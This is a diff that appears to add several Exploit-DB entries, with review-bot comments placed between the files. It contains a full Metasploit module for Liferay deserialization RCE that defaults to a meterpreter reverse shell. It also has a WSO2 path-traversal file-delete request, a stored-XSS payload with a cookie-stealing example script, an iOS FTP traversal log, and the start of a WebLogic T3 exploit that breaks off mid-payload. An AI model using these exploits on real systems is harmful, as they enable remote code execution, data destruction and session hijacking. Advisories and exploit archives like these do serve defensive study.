Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:10000/] + Connection[keep-alive] + Response Header: + Cache-Control[no-cache] + Content-Length[2] + Content-Type[application/json] + Connection[Close] + Server[GCDWebUploader] +- +Status: 200[OK] +GET http://localhost:10000/evil.source +Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:10000] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + 
Referer[http://localhost:10000/] + Connection[keep-alive] + Upgrade-Insecure-Requests[1] + Response Header: + Server[GCDWebUploader] + Connection[Close] + + + +1.2 +The directory traversal web vulnerability can be exploited by remote +attackers with wifi network access without user interaction. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. + + +Manual steps to reproduce ... +1. Open the ftp preview the visible folders +2. Jump back to the the following path +/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/ +3. Include the payload /(null)// and refresh via list command +4. You are now placed in an empty folder without permission to move +5. Add to /(null)/../ to the path and refresh the client +6. Path traversal successful to access the main app root path (./) that +is normally not accessable +7. Successful reproduce of the path traversal web vulnerability! + + +PoC: Payload +/(null)// to /(null)/../ + + +--- PoC Sessio Logs (FTP) --- +[21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files +[21:52:40] [R] 221 Thank you for using the FTP service on localhost. +[21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds) +[21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001 +[21:52:42] [R] Connected to 192.168.2.116 +[21:52:42] [R] 220 iosFtp server ready. +[21:52:42] [R] USER anonymous +[21:52:42] [R] 331 Password required for (null) +[21:52:42] [R] PASS (hidden) +[21:52:42] [R] 230 User (null) logged in. +[21:52:42] [R] SYST +[21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912 +[21:52:42] [R] FEAT +[21:52:42] [R] 211-Features supported +[21:52:42] [R] UTF8 +[21:52:42] [R] 211 End +[21:52:42] [R] OPTS UTF8 ON +[21:52:42] [R] 200 Type set Opts to UTF8. 
+[21:52:42] [R] PWD
+[21:52:42] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
+is the current directory.
+[21:52:42] [R] CWD /(null)/
+[21:52:42] [R] 550 CWD failed.
+[21:52:42] [R] PWD
+[21:52:42] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
+is the current directory.
+[21:52:42] [R] PASV
+[21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252)
+[21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236
+[21:52:42] [R] LIST -al
+[21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:52:42] [R] 226 Transfer complete.
+[21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s)
+[21:52:43] [R] CDUP
+[21:52:43] [R] 250 CDUP command successful.
+[21:52:43] [R] PWD
+[21:52:43] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder"
+is the current directory.
+[21:52:43] [R] PASV
+[21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51)
+[21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323
+[21:52:43] [R] LIST -al
+[21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:52:43] [R] 226 Transfer complete.
+[21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s)
+[21:52:43] [R] CDUP
+[21:52:44] [R] 250 CDUP command successful.
+[21:52:44] [R] PWD
+[21:52:44] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents"
+is the current directory.
+[21:52:44] [R] PASV
+[21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51)
+[21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707
+[21:52:44] [R] LIST -al
+[21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:52:44] [R] 226 Transfer complete.
+[21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s)
+[21:53:34] [R] CDUP
+[21:53:34] [R] 250 CDUP command successful.
+[21:53:34] [R] PWD
+[21:53:34] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45"
+is the current directory.
+[21:53:34] [R] PASV
+[21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14)
+[21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126
+[21:53:34] [R] LIST -al
+[21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:34] [R] 226 Transfer complete.
+[21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s)
+[21:53:35] [R] CDUP
+[21:53:35] [R] 250 CDUP command successful.
+[21:53:35] [R] PWD
+[21:53:35] [R] 257 "(null)" is the current directory.
+[21:53:35] [R] PASV
+[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14)
+[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718
+[21:53:35] [R] LIST -al
+[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:35] [R] 226 Transfer complete.
+[21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s)
+[21:53:35] [R] PASV
+[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14)
+[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622
+[21:53:35] [R] LIST -al
+[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:35] [R] 226 Transfer complete.
+[21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s)
+[21:53:36] [R] CDUP
+[21:53:36] [R] 550 CDUP command failed.
+[21:53:41] [R] CWD /etc
+[21:53:41] [R] 250 CWD command successful.
+[21:53:41] [R] PWD
+[21:53:41] [R] 257 "(null)" is the current directory.
+[21:53:48] [R] CDUP
+[21:53:48] [R] 550 CDUP command failed.
+[21:53:51] [R] CWD /
+[21:53:51] [R] 250 CWD command successful.
+[21:53:51] [R] PWD
+[21:53:51] [R] 257 "/" is the current directory.
+[21:53:51] [R] PASV
+[21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173)
+[21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749
+[21:53:51] [R] LIST -al
+[21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:51] [R] 226 Transfer complete.
+[21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s)
+[21:54:02] [R] TYPE I
+[21:54:02] [R] 200 Type set to I.
+
+Listing Path ./root
+- Applications
+- bin
+- cores
+- developer
+- Library
+- private
+- sbin
+- System
+- usr
+- etc
+- var
+- tmp
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/java/remote/48332.msf b/exploits/java/remote/48332.msf
new file mode 100644
index 000000000..b8e570402
--- /dev/null
+++ b/exploits/java/remote/48332.msf
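Review bot: The FTP session log does not support the `/(null)//` payload described in steps 3–5: `CWD /(null)/` is rejected with `550 CWD failed`, and what actually leaves the container is a plain `CDUP` issued from `.../Application/A9124FFE-…`, after which `PWD` reports `"(null)"` and an absolute `CWD /` succeeds and lists the device root. The root cause is therefore that the anonymous session is not anchored to the app's Documents directory — neither `CDUP` nor an absolute `CWD` is checked against a base path — and the reproduction steps should be rewritten to match the log (`CDUP` until `PWD` returns `(null)`, then `CWD /`). The container UUID in the `257` replies is per-install and should be marked as such so readers do not treat it as a fixed path. No solution section appears in this entry; the practical control is to resolve every CWD/CDUP target and reject it unless it stays under the Documents root, and to require credentials instead of accepting `anonymous`.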
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Java::HTTP::ClassLoader
+ include Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
+ 'Description' => %q{
+ This module exploits a Java unmarshalling vulnerability via JSONWS in
+ Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
+ to execute code as the Liferay user. Tested against 7.2.0 GA1.
+ },
+ 'Author' => [
+ 'Markus Wulftange', # Discovery
+ 'Thomas Etrillard', # PoC
+ 'wvu' # Module
+ ],
+ 'References' => [
+ ['CVE', '2020-7961'],
+ ['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
+ ['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'],
+ ['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271']
+ ],
+ 'DisclosureDate' => '2019-11-25', # Vendor advisory
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'java',
+ 'Arch' => ARCH_JAVA,
+ 'Privileged' => false,
+ 'Targets' => [
+ ['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ ))
+
+ register_options([
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [true, 'Base path', '/'])
+ ])
+ end
+
+ def check
+ # GET / response contains a Liferay-Portal header with version information
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path)
+ )
+
+ unless res
+ return CheckCode::Unknown('Target did not respond to check request.')
+ end
+
+ unless res.headers['Liferay-Portal']
+ return CheckCode::Unknown(
+ 'Target did not respond with Liferay-Portal header.'
+ )
+ end
+
+=begin
+ Building the Liferay-Portal header:
+ https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
+ Liferay-Portal header data:
+ https://github.com/liferay/liferay-portal/blob/master/release.properties
+
+ Example GET / response:
+ HTTP/1.1 200
+ [snip]
+ Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
+ [snip]
+=end
+ version, build = res.headers['Liferay-Portal'].scan(
+ /^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
+ ).flatten
+
+ unless version && (build = Integer(build) rescue nil)
+ return CheckCode::Detected(
+ 'Target did not respond with Liferay version and build.'
+ )
+ end
+
+ # XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
+ if build < 7201
+ return CheckCode::Appears(
+ "Liferay #{version} MAY be a vulnerable version. Please verify."
+ )
+ end
+
+ CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
+ end
+
+ def exploit
+ # NOTE: Automatic check is implemented by the AutoCheck mixin
+ super
+
+ # Start our HTTP server to provide remote classloading
+ @classloader_uri = start_service
+
+ unless @classloader_uri
+ fail_with(Failure::BadConfig, 'Could not start remote classloader server')
+ end
+
+ print_good("Started remote classloader server at #{@classloader_uri}")
+
+ # Send our remote classloader gadget to the target, triggering the vuln
+ send_request_gadget(
+ normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'),
+ # Required POST parameters for /api/jsonws/expandocolumn/update-column:
+ # https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
+ 'columnId' => rand(8..42), # Randomize for "evasion"
+ 'name' => rand(8..42), # Randomize for "evasion"
+ 'type' => rand(8..42) # Randomize for "evasion"
+ )
+ end
+
+ # Convenience method to send our gadget to a URI with desired POST params
+ def send_request_gadget(uri, vars_post = {})
+ print_status("Sending remote classloader gadget to #{full_uri(uri)}")
+
+ vars_post['+defaultData'] =
+ 'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'
+
+ vars_post['defaultData.userOverridesAsString'] =
+ "HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'vars_post' => vars_post
+ }, 0)
+ end
+
+ # Generate all marshalsec payloads for the Jackson marshaller:
+ # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
+ def go_go_gadget
+ # Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget:
+ # https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
+ gadget = Rex::Text.decode_base64(
+ <<~EOF
+ rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
+ cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
+ bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
+ ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
+ bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
+ DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
+ aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
+ AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
+ ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
+ kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
+ EOF
+ )
+
+ # Replace length-prefixed placeholder strings with our own
+ gadget.sub!("\x00\x04HACK", packed_class_name)
+ gadget.sub!("\x00\x03THE", packed_classloader_uri)
+ gadget.sub("\x00\x06PLANET", packed_class_name)
+ end
+
+ # Convenience method to pack the classloader URI as a length-prefixed string
+ def packed_classloader_uri
+ "#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/java/webapps/48313.txt b/exploits/java/webapps/48313.txt
new file mode 100644
index 000000000..7ab57c008
--- /dev/null
+++ b/exploits/java/webapps/48313.txt
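Review bot: In `go_go_gadget` the first two placeholder replacements use `sub!` while the third uses non-mutating `sub`, so the method's return value silently depends on that last call being the non-bang form — a reader who "fixes" it to `sub!` for consistency would make the method return nil whenever the placeholder is absent. Make the intent explicit with `gadget.sub!("\x00\x06PLANET", packed_class_name)` followed by a bare `gadget` as the return line (or use `sub` for all three). In `check`, `unless version && (build = Integer(build) rescue nil)` buries an assignment and an inline `rescue` inside the condition; a separate `build = Integer(build) rescue nil` before the `unless` gives the same result and reads plainly.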
@@ -0,0 +1,146 @@ +# Title: WSO2 3.1.0 - Arbitrary File Delete +# Date: 2020-04-12 +# Author: raki ben hamouda +# Vendor: https://apim.docs.wso2.com +# Softwrare link: https://apim.docs.wso2.com/en/latest/ +# CVE: N/A + + +Document Title: +=============== +WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal ) + + +##CVE not assigned yet + +##Security Update : https://apim.docs.wso2.com/en/latest/ + + +Common Vulnerability Scoring System: +==================================== +8.5 + + +Affected Product(s): +==================== +WSO2 API Manager Carbon Interface + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product . +The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests +and to delete arbitrary System files. + +The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter +of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files +via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" . + +The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. +Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction. +Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality. + +=============================== + +Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...) 
+ +[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension. +org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d +eployment\server\registryextensions\commons-dir + at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j +ava:531) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.handleResponse( +OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO +peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out +InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.client.OperationClient.execute(OperationClient.java: +149) ~[axis2_1.6.1.wso2v38.jar:?] + at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem +oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte +nsions.stub_4.7.13.jar:?] + at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient. +deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens +ions.ui_4.7.13.jar:?] + at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS +ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?] + at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t +omcat_9.0.22.wso2v1.jar:?] 
+ +*Error displayed in Web browser with body request: + +<script type="text/javascript"> + CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar"); +</script> + + + +============================= + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp + +Vulnerable Parameter(s): +[+] extensionName + + +Server version + 3.0.0 + + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +1-Attacker must have access to the Extension component(List ,Add ,Delete extensions ) +2-attacker uploads any file .jar extension +3-attacker intercepts the request that follows and modifies the parameter with traversal string: + +--- PoC Session Logs [POST] --- + +POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1 +Host: localhost:9443 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest, XMLHttpRequest +X-Prototype-Version: 1.5.0 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS +Content-Length: 22 +Origin: https://localhost:9443 +Connection: close +Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu +Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; 
region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions +Pragma: no-cache +Cache-Control: no-cache + +extensionName=../../../../INSTALL.txt + + ---------------Returned Headers in Response------------------ + +HTTP/1.1 200 +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: DENY +Content-Type: text/html;charset=UTF-8 +Content-Length: 10 +Date: Sat, 04 Jan 2020 00:55:38 GMT +Connection: close +Server: WSO2 Carbon Server \ No newline at end of file diff --git a/exploits/java/webapps/48319.txt b/exploits/java/webapps/48319.txt new file mode 100644 index 000000000..8aa2b6577 --- /dev/null +++ b/exploits/java/webapps/48319.txt 
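Review bot: The title line says `WSO2 3.1.0 - Arbitrary File Delete`, but the body's `Server version` entry says `3.0.0`, and the `##Security Update` line points at the general documentation index (`https://apim.docs.wso2.com/en/latest/`) rather than an advisory or fixed release, so a defender cannot tell from this entry which versions are affected or whether a fix exists. State the tested version once, consistently, and either cite the vendor advisory for the fix or mark the fix status as unknown.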
@@ -0,0 +1,142 @@ +# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting +# Date: 2020-04-13 +# Author: raki ben hamouda +# Vendor: https://apim.docs.wso2.com +# Softwrare link: https://apim.docs.wso2.com/en/latest/ +# CVE: N/A +# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 + +Technical Details & Description: +================================ +A remote Stored Cross Site Scripting has been discovered in WSO2 API +Manager Ressource Browser component). +The security vulnerability allows a remote attacker With access to the +component "Ressource Browser" +to inject a malicious code in Add Comment Feature. + +The vulnerability is triggered after sending a POST request to +`/carbon/info/comment-ajaxprocessor.jsp` with Parameter +"comment=targeted&path=%2F". +Remote attackers has the ablility to spread a malware,to Hijack a session +(a session with Higher privileges), or to initiate phishing attacks. + +The security risk of the Stored XSS web vulnerability is estimated as +medium with a cvss (common vulnerability scoring system) count of 5.4 +Exploitation of the Stored XSS web vulnerability requires a low privilege +web-application user account and medium or high user interaction. +Successful exploitation of the vulnerability results in Compromising the +server . 
+ + +Request Method: +[+] POST + +Module: +[+] /carbon/info/comment-ajaxprocessor.jsp + +Parameters: +[+] comment=admincomment +[+] path=%2F +======================================= + +POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1 +Host: 192.168.149.1:9443 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/ +X-Requested-With: XMLHttpRequest, XMLHttpRequest +X-Prototype-Version: 1.5.0 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH +Content-Length: 64 +Cookie: region3_registry_menu=visible; region3_metadata_menu=none; +wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; +JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; +requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; +region4_monitor_menu=none; region5_tools_menu=none; +current-breadcrumb=registry_menu%252Cresource_browser_menu%2523 +Connection: close + +comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F + + + + + +============================== + + + +HTTP/1.1 200 + +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: DENY +vary: accept-encoding +Content-Type: text/html;charset=UTF-8 +Content-Language: en-US +Date: Tue, 31 Dec 2019 10:50:00 GMT +Connection: close +Server: WSO2 Carbon Server +Content-Length: 3144 + + +//the body of response includes attacker malicious script + + +<a class="closeButton icon-link registryWriteOperation" +onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" +style="background-image: +url(../admin/images/delete.gif);position:relative;float:right"> </a> + + + <iframe href=http://phishing_url> + <br/> +posted on 0m ago (on Tue Dec 31 
11:50:00 GMT+01:00 2019) by attacker + + + +Proof of Concept (PoC): +======================= + +//Let's suppose we're Attacking an admin with higher privileges + + + +1-Attacker opens his account + +2-add arbitrary comment + + +3-intercepts the request + + +4-add malicious script to the comment + + +5-admin access his account,he wants to add a comment,the malicious script +got executed + + +===>Admin account compromised + + + +=============================================================================== + + + +Example malicious script : + + +<script> + alert(document.cookie); +</script> + + + +=============================================================================== \ No newline at end of file diff --git a/exploits/java/webapps/48320.py b/exploits/java/webapps/48320.py new file mode 100755 index 000000000..99b9fe8af --- /dev/null +++ b/exploits/java/webapps/48320.py 
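Review bot: The description ends with `Successful exploitation of the vulnerability results in Compromising the server .`, which contradicts the `medium` / `5.4` rating two sentences earlier and the PoC section, which describes hijacking an administrator's session through a stored comment. Replace that sentence with the impact the PoC actually demonstrates, e.g. `Successful exploitation results in script execution in the browser of any user who views the comment, including administrators.`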
@@ -0,0 +1,90 @@
+# Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
+# Author: nu11secur1ty
+# Date: 2020-03-31
+# Vendor: Oracle
+# Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip
+# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
+# CVE: CVE-2020-2555
+
+
+[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
+[+] Source: readme from GitHUB
+
+
+[Exploit Program Code]
+--------------------------
+
+#!/usr/bin/python
+# @nu11secur1ty
+import socket
+import os
+import sys
+import struct
+
+if len(sys.argv) < 3:
+ print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
+ sys.exit()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(5)
+
+server_address = (sys.argv[1], int(sys.argv[2]))
+print '[+] Connecting to %s port %s' % server_address
+sock.connect(server_address)
+
+# Send headers
+headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
+print 'sending "%s"' % headers
+sock.sendall(headers)
+
+data = sock.recv(1024)
+print >>sys.stderr, 'received "%s"' % data
+
+payloadObj = open(sys.argv[3],'rb').read()
+
+payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e